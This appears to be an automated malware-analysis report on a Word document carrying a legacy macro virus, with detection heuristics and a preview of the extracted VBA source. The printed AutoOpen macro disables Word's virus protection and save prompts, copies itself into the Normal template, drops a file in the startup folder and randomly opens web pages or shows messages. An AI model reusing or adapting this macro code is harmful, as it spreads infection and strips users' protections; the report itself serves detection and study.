MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits characteristics of legacy WordBasic macro viruses and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening. ClamAV detections further indicate its malicious nature. The embedded URLs, while mostly benign or unknown, are included as potential indicators.
Heuristics 6
-
ClamAV: Doc.Trojan.Class-36 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-36
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.cannabisculture.com� In document text (OLE body)
- http://www.Microsoft.com�In document text (OLE body)
- http://www.cannabisculture.comIn document text (OLE body)
- http://www.Microsoft.comIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23182 bytes |
SHA-256: 1249148dde102125d8145d9453a271418b07567bd84464282141dd5dac62f925 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-29
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'1260725744891540719504126072574489154071950412607257448915407195041260725744891540719504
Randomize
'9361335736944422225936133573694442222593613357369444222259361335736944422225
x = 0: o = 0
'10583180112420650839616105831801124206508396161058318011242065083961610583180112420650839616
On Error GoTo 93
'16749620316932004136609167496203169320041366091674962031693200413660916749620316932004136609
Options.VirusProtection = False
'2266801248143360565824226680124814336056582422668012481433605658242266801248143360565824
Options.SaveNormalPrompt = False
'4325692828915961542921432569282891596154292143256928289159615429214325692828915961542921
Options.ConfirmConversions = False
'3213952562528189066816321395256252818906681632139525625281890668163213952562528189066816
fx = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'372844572114288855296372844572114288855296372844572114288855296372844572114288855296
xf = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'3194736484110334016319473648411033401631947364841103340163194736484110334016
If xf > 96 And fx > 0 Then GoTo 93
'318129840938479530244318129840938479530244318129840938479530244318129840938479530244
If xf < 96 Then
'4837624291649524051600483762429164952405160048376242916495240516004837624291649524051600
Set xs = NormalTemplate.VBProject.VBComponents.Item(1)
'2057359922527128725264205735992252712872526420573599225271287252642057359922527128725264
ActiveDocument.VBProject.VBComponents.Item(1).Name = xs.Name
'7016777166429338208656701677716642933820865670167771664293382086567016777166429338208656
ActiveDocument.VBProject.VBComponents.Item(1).Export Application.StartupPath & "seedii$.dll"
'13444322222519281544164134443222225192815441641344432222251928154416413444322222519281544164
End If
'568493417617033002769568493417617033002769568493417617033002769568493417617033002769
If fx = 0 Then Set xs = ActiveDocument.VBProject.VBComponents.Item(1)
'15386320051635112388689153863200516351123886891538632005163511238868915386320051635112388689
k = Int(Rnd(1) * 100) + 1
'208513600361988676208513600361988676208513600361988676208513600361988676
If k = 99 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.cannabisculture.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'1207965633641848140100120796563364184814010012079656336418481401001207965633641848140100
l = Int(Rnd(1) * 75) + 1
'1487135819565962310656148713581956596231065614871358195659623106561487135819565962310656
If l = 74 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.Microsoft.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'212311126812447577729212311126812447577729212311126812447577729212311126812447577729
m = Int(Rnd(1) * 50) + 1
'4696192384939151349689469619238493915134968946961923849391513496894696192384939151349689
If m = 49 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
'151681392812028061156151681392812028061156151681392812028061156151681392812028061156
n = Int(Rnd(1) * 25) + 1
'The GeniusTrueFalse8.0.4412c:\program files\microsoft office\office\startupLaffADayII.doc8.0a
If n = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(32) + Chr(73) + Chr(73)
'The GeniusTrueFalse8.0.4412c:
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.